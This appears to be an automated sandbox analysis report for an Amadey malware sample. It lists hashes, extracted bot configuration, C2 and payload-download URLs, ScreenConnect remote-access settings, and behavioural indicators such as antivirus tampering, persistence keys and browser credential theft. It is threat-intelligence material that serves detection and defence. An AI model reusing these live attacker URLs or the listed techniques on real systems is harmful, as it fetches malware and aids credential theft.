amadey | c0472272fbb70a86f21f0b3f156a74e29c9cb3b9c56fefc5594e90879144d4b9

Analysis

max time kernel
118s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2025, 15:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

df504a29ad522d6eabe6258886d296bc.exe
Size

1.8MB
MD5

df504a29ad522d6eabe6258886d296bc
SHA1

70d007b95628877924e5a41cceabcba93bc46a80
SHA256

c0472272fbb70a86f21f0b3f156a74e29c9cb3b9c56fefc5594e90879144d4b9
SHA512

3c356a28dbc7bd1e3c3219cb6f1c55f8ed68702d8e814d9e4de47a0fdb1ebbbaeacc1d7375b157fba7cfaf2487e2a2adde26db121c6f1c5ea1d1c8ce5085ac79
SSDEEP

24576:IkJ43JIC/TVPGIYZ6KQ9s7/FtxWF1nJ/zFN4qTYZkNLH/PcFPoO9Rvj2QXNij:II47/T9+oKQ+/WFXFN4qTYZeLkRouTN

Score

10^/10

amadey gcleaner healer stealc 092155 trump credential_access defense_evasion discovery dropper execution exploit loader persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/9656-21240-0x0000000000510000-0x0000000000974000-memory.dmp	healer
behavioral2/memory/9656-21239-0x0000000000510000-0x0000000000974000-memory.dmp	healer
behavioral2/memory/9656-21959-0x0000000000510000-0x0000000000974000-memory.dmp	healer

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 652 created 2968	652	Exam.com	50
PID 2380 created 2968	2380	Exam.com	50

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	785956b81d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	da26fd5ce6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	df504a29ad522d6eabe6258886d296bc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d88b6fe64d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6850b4c5cd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f5cf9bfc02.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	79cfa38bf5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE

Blocklisted process makes network request 1 IoCs

flow	pid	Process
87	4752	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4752	powershell.exe
2912	powershell.exe
1476	powershell.exe
5652	powershell.exe
2268	powershell.exe
752	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
110	4448	rapes.exe
30	4448	rapes.exe
133	4448	rapes.exe
133	4448	rapes.exe
133	4448	rapes.exe
148	4880	svchost015.exe
180	4524	svchost015.exe
87	4752	powershell.exe
88	2912	powershell.exe
121	4448	rapes.exe
61	4448	rapes.exe
61	4448	rapes.exe
61	4448	rapes.exe
61	4448	rapes.exe
61	4448	rapes.exe
116	1080	svchost.exe
58	4448	rapes.exe
107	4448	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
1816	takeown.exe
5184	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (f63a82ffaf9f93d1)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=horipalok.top&p=8880&s=b6a2319f-7673-4227-90d9-6f106ab5cfab&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAD3tTr0bTh0iCwFT%2fLJMQ5QAAAAACAAAAAAAQZgAAAAEAACAAAADxxfa7NLSOXh2qZiq44wNAXyBYUMaYCe2%2flAkbE9U0fwAAAAAOgAAAAAIAACAAAACrwbr9MU7q%2bvwSgMTKfYyLaxSB2j8kPyym0MW%2fseuwy6AEAADf0zKHk%2b4ZW6fzrOVdI6R71NPX4EQRnvuu%2fEAk9WbA9h9LMxOtD%2b6JwgLh8IZa78Kpu741xW8Jl%2feGLV6PWCeVMSyvVK3EP9wFqILUA8GE6fO4GYkAJQ8kahAGxdWY69adeQwVrMtiLTOT9hR43MXgkNaqxlSjpjkH0Go8vS84TAHr%2bFkUJDBjuzXjabenvEFprDH6Kfio5C5mmLFPs6nnS9SUQ3gHs5RXlUxu8D4l2mbM%2fTBSGk9TOVDbVPzvjw7QotEivDG%2fnZWFUKhbRjbKCVxrnzqlBiQzqQ3jYpro4ancgMkxdOP5SdjtHHB2q6oG8Ylpi5hFMa%2fVmJIDB9MZZAEQ%2bdRxwOK3O055BtjMnHfGMbK8u%2b3rX5%2bWSnkrqh%2fNUy%2fgBpmyuqqXJuURFG3%2fB4Nl%2bJZUiFghcpSQwHBl7D0mF8wz%2fCYwWq%2fm6l3QNZy7%2fetclXwODpqpaVUOFpFmuID%2fLpBWj7B3uSG7njpNQ2Ry2mB22T4SlvmnkmLtwtgHJENp0mvSB%2bl2vD0%2facY2fzDzPILa0DvLHezCacsXp7oqjQOV3RwRg8IDB2IkL0ufceWUHjC%2bAIclAYDnZxbVB2%2bzgp4KaGWsaPYOxRw9%2b8waxOClJldLpSYUp1gWL%2fIz5ljCBWSbnAGAhbOfqJFADqozfbOAl4b51ukkDliWFz%2f8NXPOj%2bIdujAP5IqOfI0w729Pblv2oVQd7o2iI4peOL6kqiPIavxyHo4L8zIL6vvAoKjSlfFuNls9pxuoasZA4R9GgxBA1FZElKVIoBfC7MZAtAlaBM%2bVq9zIr8RbCELnInsAYKdNGmwKOXDLR2sPV24cXOYk4I5zBOpHKWybrY2dg2%2bJDr8RxGY8VFjg%2fR5T3B%2b5xaQx60aVoYOyk2dqRmkteZxSqCPfIHEB9FConraq9bKZgNJzrIId8FAb7Ihh1TZcLWRhdEnN8ITjzBaAh80qcl2qLUSgkfd4SMRW3NKtGTgmGA66pc8UWp0ZvDj7GO1iAT%2fMoS4IhKynIm73LHxj3pPpoK3FSK3%2fI%2fistczP7hBqc59D29pZM9jYH%2b9dobir0wfJZKAzQ%2fk%2fTgAdLHW5iftBHWpE9g3ciEZtYb0%2b2ZyEFqjRFwgymvyxnxEVsV%2bDzuydhMHAJlIUSOjMhlIMOsKYthULBHvqaiD%2fNyOqAUbLucFxQv2B1arB40PZi96nCGFvHXq0UPfFGrCji4a93ALBWLpHJOgKSbrc%2fPU4E%2bhs5WMx%2bU7qirAyWz3zxFKtCTe%2fDQIsMnu%2f%2btvoIpRnlSCDZlihwDEgPJbTeaTocU3ElpS0CHaEZMui7eosUsSeXoYuxx7BVq6w9V7QrWl88lvgObI0gGzytgTF1HnxMqDfmRuq64i0aFDoxjwzXJCxac%2fMKIelFjCzBtSCY49N7GnhrXUZMFf8ebtjVzKC82R6MBh7zeA6j9OkMXOmFfLmVIpVT92hEsDMBGnjNfCE7VzxXOAYDnGxtB1fKK%2fZimeu7Z2TsV%2fb8oV4J6V3IHj1uIz51kIg7dZT91Q2U62rUocT%2fybY3tcPmiImzhDQtd39Ni7lxoCgT%2beqWUAAAACYdIZajZeSzSqu3zt0Y7F3RXhxgVr1xLn%2fBC7H93u8VeoDZeX9MqeZ8TOu7teeaCp5QhXyNoO9%2bIBqSQ8hL%2b0W&t=purchased\""	ScreenConnect.ClientService.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
7984	chrome.exe
11104	msedge.exe
9984	msedge.exe
12068	msedge.exe
6824	chrome.exe
7428	chrome.exe
7448	chrome.exe
7712	chrome.exe

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	785956b81d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d88b6fe64d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	79cfa38bf5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	785956b81d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	da26fd5ce6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6850b4c5cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6850b4c5cd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f5cf9bfc02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	df504a29ad522d6eabe6258886d296bc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	da26fd5ce6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	df504a29ad522d6eabe6258886d296bc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d88b6fe64d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f5cf9bfc02.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	79cfa38bf5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	df504a29ad522d6eabe6258886d296bc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	tool.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	TbV75ZR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	WLbfHbp.exe

Deletes itself 1 IoCs

pid	Process
4888	w32tm.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 35 IoCs

pid	Process
4448	rapes.exe
3100	TbV75ZR.exe
4468	79cfa38bf5.exe
652	Exam.com
5372	tool.exe
2280	WLbfHbp.exe
1608	BIm18E9.exe
3592	rapes.exe
996	7d1dcbe9af.exe
364	ScreenConnect.ClientService.exe
5900	ScreenConnect.WindowsClient.exe
5456	ScreenConnect.WindowsClient.exe
3076	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
2380	apple.exe
2640	11.exe
3496	11.exe
2768	483d2fa8a0d53818306efeb32d3.exe
2380	Exam.com
4348	785956b81d.exe
4880	svchost015.exe
1956	da26fd5ce6.exe
4524	svchost015.exe
4344	BIm18E9.exe
5544	7IIl2eE.exe
5840	TbV75ZR.exe
5216	f73ae_003.exe
1000	WLbfHbp.exe
4872	tzutil.exe
4888	w32tm.exe
13016	rapes.exe
13028	a899546335.exe
5848	d88b6fe64d.exe
6048	6850b4c5cd.exe
7924	65f4920f26.exe
9656	f5cf9bfc02.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	d88b6fe64d.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	6850b4c5cd.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	79cfa38bf5.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	da26fd5ce6.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	f5cf9bfc02.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	df504a29ad522d6eabe6258886d296bc.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	785956b81d.exe

Loads dropped DLL 22 IoCs

pid	Process
3116	MsiExec.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
4808	rundll32.exe
3024	MsiExec.exe
2432	MsiExec.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe
364	ScreenConnect.ClientService.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1816	takeown.exe
5184	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d88b6fe64d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341690101\\d88b6fe64d.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6850b4c5cd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341700101\\6850b4c5cd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\65f4920f26.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341710101\\65f4920f26.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d1dcbe9af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341150101\\7d1dcbe9af.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10341160121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000700000002438a-957.dat	autoit_exe
behavioral2/files/0x000300000001da2d-21173.dat	autoit_exe

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

persistence privilege_escalation

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\mlklapox.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\mlklapox.newcfg	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
1312	tasklist.exe
2764	tasklist.exe
6096	tasklist.exe
2276	tasklist.exe
4488	tasklist.exe
6116	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

pid	Process
1376	df504a29ad522d6eabe6258886d296bc.exe
4448	rapes.exe
4468	79cfa38bf5.exe
3592	rapes.exe
3076	Temp3FVAO6VTMUUF9DKZFXPVEGBHCTNIP6FP.EXE
2768	483d2fa8a0d53818306efeb32d3.exe
4348	785956b81d.exe
1956	da26fd5ce6.exe
13016	rapes.exe
5848	d88b6fe64d.exe
6048	6850b4c5cd.exe
9656	f5cf9bfc02.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4348 set thread context of 4880	4348	785956b81d.exe	242
PID 1956 set thread context of 4524	1956	da26fd5ce6.exe	246
PID 13028 set thread context of 13224	13028	a899546335.exe	284

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
